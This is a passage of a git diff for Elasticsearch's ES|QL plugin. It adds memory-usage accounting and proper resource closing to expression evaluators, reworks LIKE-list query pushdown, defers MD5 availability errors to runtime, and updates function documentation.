org.elasticsearch.compute.operator.EvalOperator.ExpressionEvaluator; +import org.elasticsearch.core.Releasables; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FoldContext; import org.elasticsearch.xpack.esql.core.expression.TypeResolutions; @@ -131,6 +133,7 @@ public String toString() { * */ private static class Evaluator implements ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Evaluator.class); private final 
DriverContext context; private final ExpressionEvaluator field; private final ExpressionEvaluator delim; @@ -185,6 +188,13 @@ public final String toString() { } @Override - public void close() {} + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed() + delim.baseRamBytesUsed(); + } + + @Override + public void close() { + Releasables.close(field, delim); + } } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvCount.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvCount.java index f36d121ef104f..2ef9b80e08a27 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvCount.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvCount.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.multivalue; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.compute.data.Block; @@ -110,6 +111,8 @@ public String toString() { } private static class Evaluator extends AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Evaluator.class); + protected Evaluator(DriverContext driverContext, EvalOperator.ExpressionEvaluator field) { super(driverContext, field); } @@ -153,5 +156,10 @@ protected Block evalSingleValuedNullable(Block ref) { protected Block evalSingleValuedNotNullable(Block ref) { return driverContext.blockFactory().newConstantIntBlockWith(1, ref.getPositionCount()); } + + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSort.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSort.java index 4653b5f74dc40..e2e481b84f4f4 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSort.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSort.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.multivalue; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.TriFunction; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; @@ -289,6 +290,8 @@ public String toString() { } private static class Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Evaluator.class); + private final BlockFactory blockFactory; private final EvalOperator.ExpressionEvaluator field; private final boolean order; @@ -322,6 +325,13 @@ public String toString() { } @Override - public void close() {} + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + + @Override + public void close() { + field.close(); + } } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/X-CoalesceEvaluator.java.st 
b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/X-CoalesceEvaluator.java.st index 83a32ad6d0f2b..5eec0ab6903ad 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/X-CoalesceEvaluator.java.st +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/X-CoalesceEvaluator.java.st @@ -11,6 +11,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.nulls; $if(BytesRef)$ import org.apache.lucene.util.BytesRef; $endif$ +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.$Type$Block; import org.elasticsearch.compute.data.Page; @@ -28,12 +29,14 @@ import java.util.stream.IntStream; /** * {@link EvalOperator.ExpressionEvaluator} implementation for {@link Coalesce}. - * This class is generated. Edit {@code X-InEvaluator.java.st} instead. + * This class is generated. Edit {@code X-CoalesceEvaluator.java.st} instead. */ abstract sealed class Coalesce$Type$Evaluator implements EvalOperator.ExpressionEvaluator permits Coalesce$Type$Evaluator.Coalesce$Type$EagerEvaluator, // Coalesce$Type$Evaluator.Coalesce$Type$LazyEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Coalesce$Type$Evaluator.class); + static ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEvaluator, List children) { List childEvaluators = children.stream().map(toEvaluator::apply).toList(); if (childEvaluators.stream().allMatch(ExpressionEvaluator.Factory::eagerEvalSafeInLazy)) { @@ -133,6 +136,15 @@ abstract sealed class Coalesce$Type$Evaluator implements EvalOperator.Expression return getClass().getSimpleName() + "[values=" + evaluators + ']'; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (ExpressionEvaluator e : evaluators) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public final void close() { Releasables.closeExpectNoException(() -> Releasables.close(evaluators)); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWith.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWith.java index 52dedcb670372..5a165d7c822a0 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWith.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWith.java @@ -151,7 +151,7 @@ public Query asQuery(LucenePushdownPredicates pushdownPredicates, TranslatorHand // TODO: Get the real FoldContext here var wildcardQuery = "*" + QueryParser.escape(BytesRefs.toString(suffix.fold(FoldContext.small()))); - return new WildcardQuery(source(), fieldName, wildcardQuery); + return new WildcardQuery(source(), fieldName, wildcardQuery, false, false); } @Override diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Hash.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Hash.java index be0a7b2fe27b2..c95e229b04419 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Hash.java +++ 
b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Hash.java @@ -11,6 +11,7 @@ import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; +import org.elasticsearch.common.util.Result; import org.elasticsearch.compute.ann.Evaluator; import org.elasticsearch.compute.ann.Fixed; import org.elasticsearch.compute.operator.BreakingBytesRefBuilder; @@ -202,6 +203,14 @@ public static HashFunction create(BytesRef literal) throws NoSuchAlgorithmExcept return new HashFunction(algorithm, MessageDigest.getInstance(algorithm)); } + public static Result tryCreate(String algorithm) { + try { + return Result.of(new HashFunction(algorithm, MessageDigest.getInstance(algorithm))); + } catch (NoSuchAlgorithmException e) { + return Result.failure(e); + } + } + public HashFunction copy() { try { return new HashFunction(algorithm, MessageDigest.getInstance(algorithm)); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Md5.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Md5.java index b42ec1036cb5b..4d30f6b1b37f4 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Md5.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Md5.java @@ -9,6 +9,8 @@ import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; +import org.elasticsearch.common.util.Result; +import org.elasticsearch.xpack.esql.VerificationException; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.tree.NodeInfo; import org.elasticsearch.xpack.esql.core.tree.Source; @@ -18,17 +20,24 @@ import org.elasticsearch.xpack.esql.expression.function.scalar.string.Hash.HashFunction; import java.io.IOException; +import java.security.MessageDigest; +import java.security.NoSuchAlgorithmException; import java.util.List; public class Md5 extends AbstractHashFunction { public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry(Expression.class, "MD5", Md5::new); - private static final HashFunction MD5 = HashFunction.create("MD5"); + /** + * As of Java 14, it is permissible for a JRE to ship without the {@code MD5} {@link MessageDigest}. + * We want the "md5" function in ES|QL to fail at runtime on such platforms (rather than at startup) + * so we wrap the {@link HashFunction} in a {@link Result}. 
+ */ + private static final Result MD5 = HashFunction.tryCreate("MD5"); @FunctionInfo( returnType = "keyword", - description = "Computes the MD5 hash of the input.", + description = "Computes the MD5 hash of the input (if the MD5 algorithm is available on the JVM).", examples = { @Example(file = "hash", tag = "md5") } ) public Md5(Source source, @Param(name = "input", type = { "keyword", "text" }, description = "Input to hash.") Expression input) { @@ -41,7 +50,12 @@ private Md5(StreamInput in) throws IOException { @Override protected HashFunction getHashFunction() { - return MD5; + try { + return MD5.get(); + } catch (NoSuchAlgorithmException e) { + // Throw a new exception so that the stack trace reflects this call (rather than the static initializer for the MD5 field) + throw new VerificationException("function 'md5' is not available on this platform: {}", e.getMessage()); + } } @Override diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWith.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWith.java index f457bacf44268..3dc43e29f3fa9 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWith.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWith.java @@ -148,7 +148,7 @@ public Query asQuery(LucenePushdownPredicates pushdownPredicates, TranslatorHand // TODO: Get the real FoldContext here var wildcardQuery = QueryParser.escape(BytesRefs.toString(prefix.fold(FoldContext.small()))) + "*"; - return new WildcardQuery(source(), fieldName, wildcardQuery); + return new WildcardQuery(source(), fieldName, wildcardQuery, false, false); } @Override diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLike.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLike.java index d7d1973fceda1..da7eb6d07c61e 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLike.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLike.java @@ -38,8 +38,7 @@ public class WildcardLike extends RegexMatch { Use `LIKE` to filter data based on string patterns using wildcards. `LIKE` usually acts on a field placed on the left-hand side of the operator, but it can also act on a constant (literal) expression. The right-hand side of the operator - represents the pattern or a list of patterns. If a list of patterns is provided, - the expression will return true if any of the patterns match. + represents the pattern. The following wildcard characters are supported: @@ -51,11 +50,19 @@ also act on a constant (literal) expression. The right-hand side of the operator <> - <> - To reduce the overhead of escaping, we suggest using triple quotes strings `\"\"\"` <> + + ```{applies_to} + stack: ga 9.1 + serverless: ga + ``` + Both a single pattern and a list of patterns are supported. If a list of patterns is provided, + the expression will return true if any of the patterns match. 
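Editorial note, not part of the change set: the `Md5` hunk above swaps an eagerly created `HashFunction` for a `Result` so that a JVM without an MD5 provider fails when `md5()` is actually evaluated rather than when the class initializes. A minimal sketch of that defer-the-failure idiom, using a hypothetical `MaybeDigest` stand-in (the real `org.elasticsearch.common.util.Result` API may differ):

```java
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

// Hypothetical stand-in for Result: capture either the digest or the creation
// failure at class-load time, and only surface the failure on first use.
final class MaybeDigest {
    private final MessageDigest digest;             // non-null on success
    private final NoSuchAlgorithmException failure; // non-null on failure

    private MaybeDigest(MessageDigest digest, NoSuchAlgorithmException failure) {
        this.digest = digest;
        this.failure = failure;
    }

    static MaybeDigest tryCreate(String algorithm) {
        try {
            return new MaybeDigest(MessageDigest.getInstance(algorithm), null);
        } catch (NoSuchAlgorithmException e) {
            return new MaybeDigest(null, e); // do not throw from a static initializer
        }
    }

    MessageDigest get() throws NoSuchAlgorithmException {
        if (failure != null) {
            throw failure; // fails at call time, not at class initialization
        }
        return digest;
    }
}
```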
+ + <> + """, operator = NAME, examples = @Example(file = "docs", tag = "like")) public WildcardLike( Source source, @@ -115,11 +122,14 @@ public Translatable translatable(LucenePushdownPredicates pushdownPredicates) { public Query asQuery(LucenePushdownPredicates pushdownPredicates, TranslatorHandler handler) { var field = field(); LucenePushdownPredicates.checkIsPushableAttribute(field); - return translateField(handler.nameOf(field instanceof FieldAttribute fa ? fa.exactAttribute() : field)); + return translateField( + handler.nameOf(field instanceof FieldAttribute fa ? fa.exactAttribute() : field), + pushdownPredicates.flags().stringLikeOnIndex() + ); } // TODO: see whether escaping is needed - private Query translateField(String targetFieldName) { - return new WildcardQuery(source(), targetFieldName, pattern().asLuceneWildcard(), caseInsensitive()); + private Query translateField(String targetFieldName, boolean forceStringMatch) { + return new WildcardQuery(source(), targetFieldName, pattern().asLuceneWildcard(), caseInsensitive(), forceStringMatch); } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLikeList.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLikeList.java index 0b58594779408..d38e315b58b4f 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLikeList.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLikeList.java @@ -7,26 +7,35 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.string.regex; +import org.apache.lucene.search.MultiTermQuery.RewriteMethod; +import org.apache.lucene.util.automaton.Automaton; +import org.apache.lucene.util.automaton.CharacterRunAutomaton; +import org.elasticsearch.TransportVersion; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; +import org.elasticsearch.index.mapper.MappedFieldType; +import org.elasticsearch.index.query.SearchExecutionContext; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; import org.elasticsearch.xpack.esql.core.expression.predicate.regex.WildcardPattern; import org.elasticsearch.xpack.esql.core.expression.predicate.regex.WildcardPatternList; -import org.elasticsearch.xpack.esql.core.querydsl.query.AutomatonQuery; import org.elasticsearch.xpack.esql.core.querydsl.query.Query; import org.elasticsearch.xpack.esql.core.querydsl.query.WildcardQuery; import org.elasticsearch.xpack.esql.core.tree.NodeInfo; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.expression.function.Param; +import org.elasticsearch.xpack.esql.io.stream.ExpressionQuery; import org.elasticsearch.xpack.esql.io.stream.PlanStreamInput; import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; import org.elasticsearch.xpack.esql.planner.TranslatorHandler; import java.io.IOException; +import java.util.function.Supplier; import java.util.stream.Collectors; +import static org.elasticsearch.index.query.WildcardQueryBuilder.expressionTransportSupported; + public class WildcardLikeList extends RegexMatch { public static final NamedWriteableRegistry.Entry ENTRY = new 
NamedWriteableRegistry.Entry( Expression.class, @@ -34,6 +43,30 @@ public class WildcardLikeList extends RegexMatch { WildcardLikeList::new ); + Supplier automatonSupplier = new Supplier<>() { + Automaton cached; + + @Override + public Automaton get() { + if (cached == null) { + cached = pattern().createAutomaton(caseInsensitive()); + } + return cached; + } + }; + + Supplier characterRunAutomatonSupplier = new Supplier<>() { + CharacterRunAutomaton cached; + + @Override + public CharacterRunAutomaton get() { + if (cached == null) { + cached = new CharacterRunAutomaton(automatonSupplier.get()); + } + return cached; + } + }; + /** * The documentation for this function is in WildcardLike, and shown to the users `LIKE` in the docs. */ @@ -92,8 +125,12 @@ protected WildcardLikeList replaceChild(Expression newLeft) { */ @Override public Translatable translatable(LucenePushdownPredicates pushdownPredicates) { - return pushdownPredicates.isPushableAttribute(field()) ? Translatable.YES : Translatable.NO; - + if (supportsPushdown(pushdownPredicates.minTransportVersion())) { + return pushdownPredicates.isPushableAttribute(field()) ? Translatable.YES : Translatable.NO; + } else { + // The ExpressionQuery we use isn't serializable to all nodes in the cluster. + return Translatable.NO; + } } /** @@ -104,20 +141,40 @@ public Translatable translatable(LucenePushdownPredicates pushdownPredicates) { public Query asQuery(LucenePushdownPredicates pushdownPredicates, TranslatorHandler handler) { var field = field(); LucenePushdownPredicates.checkIsPushableAttribute(field); - return translateField(handler.nameOf(field instanceof FieldAttribute fa ? fa.exactAttribute() : field)); + String targetFieldName = handler.nameOf(field instanceof FieldAttribute fa ? fa.exactAttribute() : field); + return translateField(targetFieldName); } - /** - * Translates the field to a {@link WildcardQuery} using the first pattern in the list. - * Throws an {@link IllegalArgumentException} if the pattern list contains more than one pattern. - */ - private Query translateField(String targetFieldName) { - return new AutomatonQuery(source(), targetFieldName, pattern().createAutomaton(caseInsensitive()), getAutomatonDescription()); + private boolean supportsPushdown(TransportVersion version) { + return version == null || expressionTransportSupported(version); + } + + @Override + public org.apache.lucene.search.Query asLuceneQuery( + MappedFieldType fieldType, + RewriteMethod constantScoreRewrite, + SearchExecutionContext context + ) { + return fieldType.automatonQuery( + automatonSupplier, + characterRunAutomatonSupplier, + constantScoreRewrite, + context, + getLuceneQueryDescription() + ); } - private String getAutomatonDescription() { + private String getLuceneQueryDescription() { // we use the information used to create the automaton to describe the query here String patternDesc = pattern().patternList().stream().map(WildcardPattern::pattern).collect(Collectors.joining("\", \"")); return "LIKE(\"" + patternDesc + "\"), caseInsensitive=" + caseInsensitive(); } + + /** + * Translates the field to a {@link WildcardQuery} using the first pattern in the list. + * Throws an {@link IllegalArgumentException} if the pattern list contains more than one pattern. 
+ */ + private Query translateField(String targetFieldName) { + return new ExpressionQuery(source(), targetFieldName, this); + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/util/Delay.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/util/Delay.java index 182f221a70f75..8f7ac9373b6e5 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/util/Delay.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/util/Delay.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.util; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.Build; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; @@ -109,6 +110,8 @@ public ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEva } static final class DelayEvaluator implements ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DelayEvaluator.class); + private final DriverContext driverContext; private final long ms; @@ -138,6 +141,11 @@ private void delay(long ms) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED; + } + @Override public void close() { diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/vector/Knn.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/vector/Knn.java index ecce0b069693d..df1542a2c292c 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/vector/Knn.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/vector/Knn.java @@ -11,6 +11,8 @@ import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; +import org.elasticsearch.xpack.esql.capabilities.PostAnalysisPlanVerificationAware; +import org.elasticsearch.xpack.esql.common.Failures; import org.elasticsearch.xpack.esql.core.InvalidArgumentException; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FoldContext; @@ -31,6 +33,7 @@ import org.elasticsearch.xpack.esql.expression.function.fulltext.FullTextFunction; import org.elasticsearch.xpack.esql.expression.function.fulltext.Match; import org.elasticsearch.xpack.esql.io.stream.PlanStreamInput; +import org.elasticsearch.xpack.esql.plan.logical.LogicalPlan; import org.elasticsearch.xpack.esql.planner.TranslatorHandler; import org.elasticsearch.xpack.esql.querydsl.query.KnnQuery; @@ -39,6 +42,7 @@ import java.util.List; import java.util.Map; import java.util.Objects; +import java.util.function.BiConsumer; import static java.util.Map.entry; import static org.elasticsearch.index.query.AbstractQueryBuilder.BOOST_FIELD; @@ -55,9 +59,8 @@ import static org.elasticsearch.xpack.esql.core.type.DataType.DENSE_VECTOR; import static org.elasticsearch.xpack.esql.core.type.DataType.FLOAT; import static org.elasticsearch.xpack.esql.core.type.DataType.INTEGER; -import static org.elasticsearch.xpack.esql.expression.function.fulltext.Match.getNameFromFieldAttribute; -public class Knn extends FullTextFunction implements OptionalArgument, VectorFunction { +public class Knn extends FullTextFunction implements 
OptionalArgument, VectorFunction, PostAnalysisPlanVerificationAware { public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry(Expression.class, "Knn", Knn::readFrom); @@ -235,6 +238,14 @@ private Map queryOptions() throws InvalidArgumentException { return options; } + @Override + public BiConsumer postAnalysisPlanVerification() { + return (plan, failures) -> { + super.postAnalysisPlanVerification().accept(plan, failures); + fieldVerifier(plan, this, field, failures); + }; + } + @Override public Expression replaceChildren(List newChildren) { return new Knn( diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNotNull.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNotNull.java index 82818c5a329c0..52efaa79fd846 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNotNull.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNotNull.java @@ -6,6 +6,7 @@ */ package org.elasticsearch.xpack.esql.expression.predicate.nulls; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.compute.data.Block; @@ -25,6 +26,7 @@ import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.evaluator.mapper.EvaluatorMapper; +import org.elasticsearch.xpack.esql.expression.function.Example; import org.elasticsearch.xpack.esql.expression.function.FunctionInfo; import org.elasticsearch.xpack.esql.expression.function.Param; import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; @@ -54,7 +56,8 @@ public class IsNotNull extends UnaryScalarFunction implements EvaluatorMapper, N "unsigned_long", "counter_long", "counter_integer", - "counter_double" } + "counter_double" }, + examples = { @Example(file = "null", tag = "is-not-null") } ) public IsNotNull( Source source, @@ -148,6 +151,8 @@ public String toString() { record IsNotNullEvaluator(DriverContext driverContext, EvalOperator.ExpressionEvaluator field) implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(IsNotNullEvaluator.class); + @Override public Block eval(Page page) { try (Block fieldBlock = field.eval(page)) { @@ -163,6 +168,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + @Override public void close() { Releasables.closeExpectNoException(field); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNull.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNull.java index e93124af54186..6f91c83940b34 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNull.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNull.java @@ -6,6 +6,7 @@ */ package org.elasticsearch.xpack.esql.expression.predicate.nulls; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import 
org.elasticsearch.compute.data.Block; @@ -26,6 +27,7 @@ import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.evaluator.mapper.EvaluatorMapper; +import org.elasticsearch.xpack.esql.expression.function.Example; import org.elasticsearch.xpack.esql.expression.function.FunctionInfo; import org.elasticsearch.xpack.esql.expression.function.Param; import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; @@ -51,7 +53,8 @@ public class IsNull extends UnaryScalarFunction implements EvaluatorMapper, Nega "unsigned_long", "counter_long", "counter_integer", - "counter_double" } + "counter_double" }, + examples = { @Example(file = "null", tag = "is-null") } ) public IsNull( Source source, @@ -150,6 +153,8 @@ public String toString() { record IsNullEvaluator(DriverContext driverContext, EvalOperator.ExpressionEvaluator field) implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(IsNullEvaluator.class); + @Override public Block eval(Page page) { try (Block fieldBlock = field.eval(page)) { @@ -165,6 +170,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + @Override public void close() { Releasables.closeExpectNoException(field); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/X-InEvaluator.java.st b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/X-InEvaluator.java.st index 41b9d36cd4749..9833e1510bc74 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/X-InEvaluator.java.st +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/X-InEvaluator.java.st @@ -9,6 +9,7 @@ package org.elasticsearch.xpack.esql.expression.predicate.operator.comparison; // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.$Type$Block; @@ -31,6 +32,8 @@ import java.util.BitSet; * This class is generated. Edit {@code X-InEvaluator.java.st} instead. 
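The various `BASE_RAM_BYTES_USED` additions in these hunks share one shape: a per-class shallow size computed once via `RamUsageEstimator`, plus the recursive size of any child evaluators. A minimal sketch of that shape, assuming `lucene-core` is on the classpath; the `SizedEvaluator` interface and both record names are invented for illustration.

```java
import org.apache.lucene.util.RamUsageEstimator;

final class RamAccountingDemo {
    // Hypothetical mini version of the evaluator contract.
    interface SizedEvaluator {
        long baseRamBytesUsed();
    }

    record ConstantEval() implements SizedEvaluator {
        static final long BASE = RamUsageEstimator.shallowSizeOfInstance(ConstantEval.class);
        public long baseRamBytesUsed() { return BASE; }
    }

    // A wrapping evaluator reports its own shallow size plus its child's, just as
    // IsNullEvaluator reports BASE_RAM_BYTES_USED + field.baseRamBytesUsed().
    record NotEval(SizedEvaluator child) implements SizedEvaluator {
        static final long BASE = RamUsageEstimator.shallowSizeOfInstance(NotEval.class);
        public long baseRamBytesUsed() { return BASE + child.baseRamBytesUsed(); }
    }

    public static void main(String[] args) {
        System.out.println(new NotEval(new ConstantEval()).baseRamBytesUsed());
    }
}
```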
*/ public class In$Name$Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(In$Name$Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -238,6 +241,16 @@ $endif$ return "In$Name$Evaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/index/IndexResolution.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/index/IndexResolution.java index b9040d2ef40d6..4d31f48da77de 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/index/IndexResolution.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/index/IndexResolution.java @@ -6,10 